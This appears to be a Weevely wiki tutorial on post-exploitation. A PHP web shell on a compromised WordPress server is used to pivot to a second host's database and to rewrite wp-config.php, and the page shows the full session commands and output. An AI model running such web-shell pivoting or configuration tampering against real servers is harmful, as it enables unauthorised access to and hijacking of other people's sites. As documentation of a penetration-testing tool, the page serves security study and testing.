Edit db and code of a web app

Emilio edited this page Feb 4, 2018 · 3 revisions

This tutorial shows how to browse database and edit PHP scripts pivoting on a target with a strongly limited environment that does not allow to execute shell commands.

This aims to reconfigure Wordpress installed on the target machine in order to use a new database wordpress2 hosted on the server target2.

Configuration

  • Example PHP configuration: disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system
  • Used modules: sql_console, pico (file_edit), gedit (file_edit)

Session

First of all, we check that the accessibility and the credentials of the new database. Please note that the connection to target2 is done pivoting on target host, as if was a standard ssh/telnet connection.

$ ./weevely.py http://target/agent.php mypassword

[+] weevely 3.0

[+] Target:	target
[+] Session:	_weevely/sessions/target/agent_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> :sql_console -user usr2 -passwd pwd2 -host target2
usr2@target2 SQL> show databases;
+--------------------+
| information_schema |
| wordpress2         |
| test               |
+--------------------+
usr2@target2 SQL> show tables in wordpress2;
+---------------------------+
| wp_commentmeta            |
| wp_comments               |
| wp_links                  |
| wp_options                |
| wp_postmeta               |
| wp_posts                  |
| wp_term_relationships     |
| wp_term_taxonomy          |
| wp_terms                  |
| wp_usermeta               |
| wp_users                  |
+---------------------------+
usr2@target2 SQL> ^DModule 'sql_console' execution terminated
www-data@target:/var/www PHP>

Now we're ready to replace the database information in the Wordpress configuration file wp-config.php.

www-data@target:/var/www PHP> cd wordpress
www-data@target:/var/www/wordpress PHP> pico wp-config.php

Remote files can be also edited using local graphical editor like gedit

www-data@target:/var/www/wordpress PHP> gedit wp-config.php

After saving the changes and closing the editor we have the remote adjusted wp-config.php Wordpress file.

You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.
Press h to open a hovercard with more details.